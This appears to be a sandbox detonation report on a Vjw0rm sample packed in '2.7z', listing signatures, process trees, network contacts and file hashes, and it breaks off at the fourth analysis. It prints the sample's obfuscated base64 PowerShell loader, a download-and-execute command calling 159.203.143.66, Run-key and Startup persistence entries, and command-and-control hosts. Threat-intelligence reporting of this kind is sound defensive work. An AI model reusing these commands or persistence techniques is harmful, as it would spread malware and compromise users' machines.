Analysis Overview
SHA256
5139042abdffe2246bdb46ad71300c9271194697d85741bccaaab4977fa02783
Threat Level: Known bad
The file 2.7z was found to be: Known bad.
Malicious Activity Summary
Vjw0rm
Blocklisted process makes network request
Checks computer location settings
Drops startup file
Adds Run key to start application
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Gathers system information
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-23 13:08
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-01-23 13:08
Reported
2023-01-23 13:10
Platform
win7-20221111-en
Max time kernel
71s
Max time network
31s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2032 wrote to memory of 1636 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2032 wrote to memory of 1636 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2032 wrote to memory of 1636 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1636 wrote to memory of 268 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\whoami.exe |
| PID 1636 wrote to memory of 268 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\whoami.exe |
| PID 1636 wrote to memory of 268 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\whoami.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exECutionpO byPasS "(neW-oBJeCT Io.CoMPrEsSIon.DEfLaTesTrEam([SYstEM.iO.MemOryStREAM] [sYStEm.CONvErT]::fRombASe64sTrING( 'fVdpb+JMEv6eX2EhdoyVgQXbmCSjkZYRx0sOYMBkCNlIbewmMRhDbHME1v99q8puE97ZWSQ6ne46nzq6yO8PGr8LJen7c/TU5y+F3FGLj2p81ONjOT5W4lyxJckNV/4qd19hKZl8HJVgM3waRnwJG961e7LyTcpzfTm8+v5sfvSbqZgKSSrHOanYkkt2z982gwh54Rs1kTn8kBVJ+iaFj1JBNuRLedKAZeRN8bggSSBtTUaVSVQFRc3kzqrUAmaPw+IiJaiXSr/pnEnyykGaqIhKo8C1owfcceApPvIgdFe+pF7MNr4d4XY9Z5NJOJIK+WPriY3Y++g+/po/TlascWjcxop0vJDgM1sFSLJaMoctWacTObH0XSoDBMfeQ4M9uB1mNmKp6EVwMvsYsZ8jLy7l7N6Gdc0ckq3Y0lm6LjOd+PJSiIUP6E3Jn1E+inc7USN+AfmgccaeNu8suSVNHdL0IhWne7AJLGU959CYxwoJjGkNeLQJfBQ+nmjNu+HNTa4e2iA3V8q1OTOH0YC5fjuH8j/Y6H1zD+zxCZQOZ/0Fq/fvQ1M6psIKlVKpYkj/kb4U5H/IylGSj+WbcSwj5oXS38PV5lFxYAHwGHHfWSH6D9ZeqhiKBKAW5yvXl2Q5vsgff7LBnPV3T1NEtPAFJFVOwQxHwN+fHyYgoPA8/AghAUs/PiL+/PIi/atQ3uvG1/K+amULh6Wi4yK+M1ymuNRgKePGxoUoHXFEVNbZ0VW2oGDiURRJNxQwuum2bIutWW88IrNTAFLv+2A02AzG/8Hq2jVIM1CngZYl/9LOARWqjir268NsAOlmf3iv59AAzjkEZxIm4MD6R03kpo6aVEKjLBY1A0lsEir0EzdaempnNwjMtbhRU7KKlm4MIYqItVpKTOoFbU0wJDTlz+dVIVVDgqv0xM4sAFyuAXrIPtsBZxEfBgABPuwJALrA8mDOg+tGDmse2H0jwwwAE00iaSV8vQDI1thOhtibLFlRLj+FECM4h/P/F0GNfEbDa2ivoYJ9lRrF7Rczo0WWFUkyY7h2DmlVlEyTsMhcpc0Ki+VVVkodf7ta8IIiXUryv2VYwbulA7VvsgY/MK+B/jYjdvvIHh2vn7lKBZgVT+LdemGhqx3ogChPGKWmdslI08GmjoTeEKhA9o4tph5rDV591p6j+PyZM7K1RFt3b6uEfOqwBhtN+q353f9wnHDETP0TmJgoKi4VzDiDdrRgUml6mkJUJJqoU7UsciWrUbWabq4EkcaFAIyUgXcappOmikvcqFbWInRhBImnXCUyKqOEVRcXlRPvteA1yiL5K2fWEut1apoqDohDzTxCFiu1lRSStMSwTJKojISPC+S0zG81Y7SFnsT62SfxKtmhCds1WqZCG8FKYo1qWvAnEPXMw+sMHUIiCxaZZmSWaeJIuzrDn8perYnACedOVAms2nnkqoKT1J3QrwmAEpO17MwQUTp5RRHWrs9UXAu3smRUM/uSPCClDi1QSVdl5RtkfoOZYxO69N7aDTH1YYRpN6Pi1go69anH4V+5qcN8swyvIPuV0rZ+P+I3N0l9aGeDC9S/j/NWK1jhq2noODP9sEJ+aghYaVRoMzZf0JNfkNrcLG7rg0RdMlEdkonqB/aaR8vbNEmhaA6gFkuYW56HgxLWMXWeKVRk+FnX/pfJzAWOQ445hsFlzOq7MCa3g5C9sWZ/8vubfd7mzt4r7HA+XFK7+73Ngdg5Z48haw74Z7kZRGlDy5pV0nt6ddZli36ALHJO/tTi0vYzF/3nT+2nihlTxZDruqgbqma60LEidJ5d0FNJxDPBlkwdNmSFUUZncvn3wW3/19M03+zAnNBfjUf/zN/y7ZAPmkoOvQU7sYPf3bM7ety/JJNsNfUWR/FKYr2JA+/Kp9kXke3yXXFov+GzFS7qNgLCnQ3OV809tzcRB+2D8I33D3mYF5dux2w0J54D+NWD182S+zihrurdO7YO8BXZ3gN8vVnT56wboSkIniGMSDK0mk02JijF8FqYOjZ8k4j2aSrPjAOD0FgFTPl1N71vBe1u+zYHyg7vbL8TSkB8oqeWTo6oR0uL4Y2cdUCfmPpfeZBqgD8LM3CxVoZoA3nf820OPkbZQ1jOIIyKDYtwgm+bnsHigK955OKw2/EjHmwt75wvtUMumm46xIJiFDFcWz4Ns64PWIdS5UxYYxNYNEEXvmQ/TU75T7LI/GUiB6WisIb1ERY0o0r5bLGfW3jVP2VFmYDSP4UCpdk0LIRDHiW5YQr8EbdNkh9wGaHSN1Lzl+s43AfbN17krj3e8cPIAthC6W8jAQa3j9N7AD2CWOuet9oNIyuIOrOe/8OKADSXhxenUSYxL2ktA4qXS6mZRBCTBuouENmBMjGXutaSS8kowx63jreG31D15EcInLKFt4DyKGKwIfz4a+edjSGBiuQYeA9H9Z/ACQPRxX8B') ,[iO.cOMpRESsIoN.COmpRESsioNmodE]::dEcoMPReSS)| %{neW-oBJeCT SySTEM.Io.STREAmREADER( $_ ,[text.enCoDing]::asCIi)} | % {$_.reADtOeNd()} ) | . ( $shelLID[1]+$sHeLliD[13]+'x')"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe"
Network
Files
memory/2032-54-0x000007FEFB7C1000-0x000007FEFB7C3000-memory.dmp
memory/1636-55-0x0000000000000000-mapping.dmp
memory/1636-57-0x000007FEF3350000-0x000007FEF3D73000-memory.dmp
memory/1636-59-0x00000000029E4000-0x00000000029E7000-memory.dmp
memory/1636-58-0x000007FEF27F0000-0x000007FEF334D000-memory.dmp
memory/1636-60-0x000000001B800000-0x000000001BAFF000-memory.dmp
memory/268-61-0x0000000000000000-mapping.dmp
memory/1636-62-0x00000000029E4000-0x00000000029E7000-memory.dmp
memory/1636-63-0x00000000029EB000-0x0000000002A0A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-23 13:08
Reported
2023-01-23 13:10
Platform
win10v2004-20220812-en
Max time kernel
144s
Max time network
147s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exECutionpO byPasS "(neW-oBJeCT Io.CoMPrEsSIon.DEfLaTesTrEam([SYstEM.iO.MemOryStREAM] [sYStEm.CONvErT]::fRombASe64sTrING( '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') ,[iO.cOMpRESsIoN.COmpRESsioNmodE]::dEcoMPReSS)| %{neW-oBJeCT SySTEM.Io.STREAmREADER( $_ ,[text.enCoDing]::asCIi)} | % {$_.reADtOeNd()} ) | . ( $shelLID[1]+$sHeLliD[13]+'x')"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\3E52C9BE404FB11A.vbs" "iex (iwr -useb http://159.203.143.66/r/awsase/FC519B30E47289DA)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.203.143.66/r/awsase/FC519B30E47289DA)
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe"
C:\Windows\system32\systeminfo.exe
"C:\Windows\system32\systeminfo.exe"
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /all
C:\Windows\system32\nltest.exe
"C:\Windows\system32\nltest.exe" /domain_trusts
C:\Windows\system32\tasklist.exe
"C:\Windows\system32\tasklist.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
Network
| Country | Destination | Domain | Proto |
| N/A | 40.79.141.153:443 | tcp | |
| N/A | 8.8.8.8:53 | 15.89.54.20.in-addr.arpa | udp |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 93.184.220.29:80 | tcp | |
| N/A | 159.203.143.66:80 | 159.203.143.66 | tcp |
| N/A | 8.8.8.8:53 | evcs-ocsp.ws.symantec.com | udp |
| N/A | 23.51.123.27:80 | evcs-ocsp.ws.symantec.com | tcp |
| N/A | 159.203.143.66:80 | 159.203.143.66 | tcp |
Files
memory/2404-132-0x0000000000000000-mapping.dmp
memory/2404-133-0x000002087EDA0000-0x000002087EDC2000-memory.dmp
memory/2404-134-0x00007FF8836B0000-0x00007FF884171000-memory.dmp
memory/480-135-0x0000000000000000-mapping.dmp
memory/2404-136-0x00007FF8836B0000-0x00007FF884171000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\3E52C9BE404FB11A.vbs
| MD5 | 29814eb775761c5088028d1907f48c55 |
| SHA1 | cb369ec71c0a44b9b9411edf956efbb5654ab26e |
| SHA256 | ceb3b2cce642a3dcda3a370c282fd0ae6daf7521a44350d302b4a1351e4ac3db |
| SHA512 | a7ebcab691e6bbe52f150de7e1515f341bab3756c0941fc221d1aa40c54983b73158ff4037b11c18e1fddc2e634ea0fd5ab898cf716b02163c10d98159a7b3c1 |
memory/4788-138-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 00e7da020005370a518c26d5deb40691 |
| SHA1 | 389b34fdb01997f1de74a5a2be0ff656280c0432 |
| SHA256 | a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe |
| SHA512 | 9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0e1b28e135526ea20c11b043a1446714 |
| SHA1 | dbe0124e99913c3989c0b723847f118fd79b1caa |
| SHA256 | d4be4d17801b57e3ddf6caa161dc5722bf2101c7020ae40013065d7023268fa7 |
| SHA512 | 65cd6f68d19d24255004488875f2a3416ec0fa174aa2548828e8a2a9ccb04c3b3a43a66c3aeb2a385d78953307d1786fd7875f24e37a75f8e0826ea6090d5d2c |
memory/4360-141-0x0000000000000000-mapping.dmp
memory/1804-142-0x0000000000000000-mapping.dmp
memory/4788-143-0x00007FF8836B0000-0x00007FF884171000-memory.dmp
memory/1652-144-0x0000000000000000-mapping.dmp
memory/1788-145-0x0000000000000000-mapping.dmp
memory/2352-146-0x0000000000000000-mapping.dmp
memory/4788-147-0x00007FF8836B0000-0x00007FF884171000-memory.dmp
memory/4788-148-0x000002439D890000-0x000002439DA52000-memory.dmp
memory/4788-149-0x00007FF8836B0000-0x00007FF884171000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2023-01-23 13:08
Reported
2023-01-23 13:10
Platform
win7-20220901-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
Vjw0rm
Blocklisted process makes network request
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBPGleXeSh.js | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2.js | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBPGleXeSh.js | C:\Windows\System32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBPGleXeSh.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\2 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\2.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\2.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\2 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\2.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\2.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1304 wrote to memory of 1776 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 1304 wrote to memory of 1776 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 1304 wrote to memory of 1776 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 1304 wrote to memory of 456 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 1304 wrote to memory of 456 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 1304 wrote to memory of 456 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 456 wrote to memory of 584 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 456 wrote to memory of 584 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 456 wrote to memory of 584 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\2.js
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\bBPGleXeSh.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\2.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\bBPGleXeSh.js"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | javaautorun.duia.ro | udp |
| N/A | 8.8.8.8:53 | javaautorun.duia.ro | udp |
| N/A | 8.8.8.8:53 | oyo.powrkenken.info | udp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
Files
memory/1776-54-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\bBPGleXeSh.js
| MD5 | 66dc2636a8030d46088ffea48edca927 |
| SHA1 | 0b69c990c12f471bae591feff36810bee88dc8be |
| SHA256 | f65f356f01c0807a3142dcad0b4ae406dbf835dbe80fe8a6aca8abf59c74242e |
| SHA512 | 8084c417d30fec47c5b519657f2651bffc7c1c9d403eb5356aae6e47ee572610f4f4095f4f65cd2fef54c1e47592fb7e64e6c2f598539115c84b2647e6b97e0a |
memory/456-56-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\2.js
| MD5 | 23e6dafa419a763923005e18ac40b8b4 |
| SHA1 | 8e1d466bbf8278d773c30198fd166c8f2cc95134 |
| SHA256 | 12736919f6e945cb175325bcffb7ca8fff02db430fea5803c76a73cc2145436c |
| SHA512 | 9db15577ef3b80a5503c561c01914548e5c2b8a56d59673a1d48d2fa3ba205a654504adc7d297258bb70ee681e81d4b4d6367fe1d7e244ceaaff9e00780efae3 |
memory/584-58-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2.js
| MD5 | 23e6dafa419a763923005e18ac40b8b4 |
| SHA1 | 8e1d466bbf8278d773c30198fd166c8f2cc95134 |
| SHA256 | 12736919f6e945cb175325bcffb7ca8fff02db430fea5803c76a73cc2145436c |
| SHA512 | 9db15577ef3b80a5503c561c01914548e5c2b8a56d59673a1d48d2fa3ba205a654504adc7d297258bb70ee681e81d4b4d6367fe1d7e244ceaaff9e00780efae3 |
C:\Users\Admin\AppData\Roaming\bBPGleXeSh.js
| MD5 | 66dc2636a8030d46088ffea48edca927 |
| SHA1 | 0b69c990c12f471bae591feff36810bee88dc8be |
| SHA256 | f65f356f01c0807a3142dcad0b4ae406dbf835dbe80fe8a6aca8abf59c74242e |
| SHA512 | 8084c417d30fec47c5b519657f2651bffc7c1c9d403eb5356aae6e47ee572610f4f4095f4f65cd2fef54c1e47592fb7e64e6c2f598539115c84b2647e6b97e0a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBPGleXeSh.js
| MD5 | 66dc2636a8030d46088ffea48edca927 |
| SHA1 | 0b69c990c12f471bae591feff36810bee88dc8be |
| SHA256 | f65f356f01c0807a3142dcad0b4ae406dbf835dbe80fe8a6aca8abf59c74242e |
| SHA512 | 8084c417d30fec47c5b519657f2651bffc7c1c9d403eb5356aae6e47ee572610f4f4095f4f65cd2fef54c1e47592fb7e64e6c2f598539115c84b2647e6b97e0a |
Analysis: behavioral4
Detonation Overview
Submitted
2023-01-23 13:08
Reported
2023-01-23 13:10
Platform
win10v2004-20221111-en
Max time kernel
148s
